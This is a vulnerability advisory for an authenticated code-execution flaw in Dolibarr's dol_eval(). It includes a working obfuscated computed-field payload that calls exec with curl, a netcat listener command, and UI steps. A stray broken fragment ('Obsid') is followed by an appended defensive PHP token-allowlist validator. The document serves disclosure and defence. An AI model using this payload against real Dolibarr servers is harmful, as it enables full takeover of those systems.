### Summary

Dolibarr ERP & CRM has an authenticated Remote Code Execution vulnerability via an eval sanitization bypass. An attacker can inject a specially crafted payload to bypass all security checks within the `dol_eval()` function, allowing for remote code execution on the machine. This vulnerability completely undermines the application's confidentiality, integrity, and availability by granting an attacker full control over the underlying system.

### Proof of Concept

[Video proof of concept (YouTube)](https://www.youtube.com/embed/IQ31iRl2Z6g?si=xSHsWwzUpxxqls_s)

1. Authenticate to the Dolibarr service
2. Go to `/user/admin/user_extrafields.php?action=create`
3. Create a new attribute with the following parameters:
   - Label: A unique string
   - Attribute: Can be the same as "Label"
   - Type: String (1 line)
   - Computed Field: `($z = "ex") && ($q = "ec") && ($cmd = "$z$q") && $cmd ("curl localhost:5555")`
4. Hit "Save"
5. Hit the pencil ("modify") icon on the Label
6. Re-enter the above payload into the computed field.
7. Open a netcat listener: `nc -lvp 5555`
8. Hit "Save"

Obsid
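The shape of the payload above (the function name spelled as `"ex"` and `"ec"`, joined at runtime and invoked through `$cmd(...)`) is what a filter that looks for forbidden names in the expression text cannot see. As an added illustration, which is not Dolibarr's code and does not reproduce `dol_eval()`, the following hypothetical validator takes the opposite approach for a computed-field expression: it lexes the string with PHP's `token_get_all()` and accepts only an allowlist of token shapes, so a call through a variable, an assignment, an interpolated string or a non-allowlisted identifier is rejected no matter how the text is spelled. The function name `is_safe_computed_expression`, the allowlist and the sample expressions are assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Added example, not Dolibarr's own code and not a copy of dol_eval().
// Demonstrates a token-based allowlist for computed-field expressions instead
// of a name blocklist. The function name, allowlist and samples are constructed.

/**
 * Accept $expr only if every token is a literal, a plain variable, a property
 * read ($obj->name, $obj->arr['key']), a permitted operator, or a call to a
 * function on the allowlist. Calls through a variable ($cmd(...)), assignments,
 * string interpolation, "$$", "::", backticks, casts, closures and includes are
 * all rejected because they never match one of the accepted token shapes.
 */
function is_safe_computed_expression(string $expr, array $allowedFunctions): bool
{
    $allowed = array_map('strtolower', $allowedFunctions);

    // Lex as PHP, then drop the synthetic open tag and whitespace so that the
    // adjacency checks below can look at $tokens[$i + 1] directly.
    $tokens = array_values(array_filter(token_get_all('<?php ' . $expr), function ($t): bool {
        return !(is_array($t) && in_array($t[0], [T_OPEN_TAG, T_WHITESPACE], true));
    }));

    // "=" (assignment), "$", "\"", "`", "@" and ";" are deliberately absent.
    $allowedChars = ['(', ')', '[', ']', '+', '-', '*', '/', '%', '.', ',', '?', ':', '<', '>', '!'];
    $allowedOps   = [T_BOOLEAN_AND, T_BOOLEAN_OR, T_IS_EQUAL, T_IS_NOT_EQUAL, T_IS_IDENTICAL,
                     T_IS_NOT_IDENTICAL, T_IS_SMALLER_OR_EQUAL, T_IS_GREATER_OR_EQUAL];
    $allowedLits  = [T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER];

    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $t    = $tokens[$i];
        $prev = $tokens[$i - 1] ?? null;
        $next = $tokens[$i + 1] ?? null;

        if (!is_array($t)) {
            // Single-character tokens: only grouping, arithmetic and comparison.
            if (!in_array($t, $allowedChars, true)) {
                return false;
            }
            continue;
        }

        [$id, $text] = $t;

        if ($id === T_VARIABLE) {
            // "$cmd(" is a variable function call: the exact shape the bypass relies on.
            if ($next === '(') {
                return false;
            }
            continue;
        }

        if ($id === T_OBJECT_OPERATOR) {
            // Only "->name" as a property read on a variable, a prior property or an
            // array element, and never immediately called as a method.
            $after   = $tokens[$i + 2] ?? null;
            $prevOk  = $prev === ']' || (is_array($prev) && in_array($prev[0], [T_VARIABLE, T_STRING], true));
            $nextOk  = is_array($next) && $next[0] === T_STRING;
            if (!$prevOk || !$nextOk || $after === '(') {
                return false;
            }
            continue;
        }

        if ($id === T_STRING) {
            // A property name right after "->" was already validated above.
            if (is_array($prev) && $prev[0] === T_OBJECT_OPERATOR) {
                continue;
            }
            // Any other bare identifier (function or constant) must be allowlisted.
            if (!in_array(strtolower($text), $allowed, true)) {
                return false;
            }
            continue;
        }

        if (in_array($id, $allowedOps, true) || in_array($id, $allowedLits, true)) {
            continue;
        }

        // Everything else (interpolated strings, casts, "new", "function", "fn",
        // "include", "::", namespaced names, ...) is rejected by default.
        return false;
    }
    return true;
}

// Constructed samples: a benign arithmetic expression over a property read,
// the advisory's payload, and the same function called without obfuscation.
$allowlist = ['round', 'abs', 'max', 'min', 'true', 'false', 'null'];
$samples = [
    'benign'      => 'round($object->array_options["options_price"] * 1.2, 2)',
    'advisory'    => '($z = "ex") && ($q = "ec") && ($cmd = "$z$q") && $cmd ("curl localhost:5555")',
    'direct_call' => 'exec("id")',
];
foreach ($samples as $name => $expr) {
    printf("%-12s %s\n", $name, is_safe_computed_expression($expr, $allowlist) ? 'accepted' : 'REJECTED');
}
```

Run with `php validator.php` (any filename). The benign sample is accepted; the advisory payload is rejected at the first `=` and would be rejected again at `$cmd (`, and the unobfuscated `exec(` fails the allowlist check. The allowlist here is only illustrative: a real deployment widens the accepted token shapes to whatever the computed-field feature legitimately needs, and the point is that validation is done on lexed tokens rather than by searching the raw string for forbidden names.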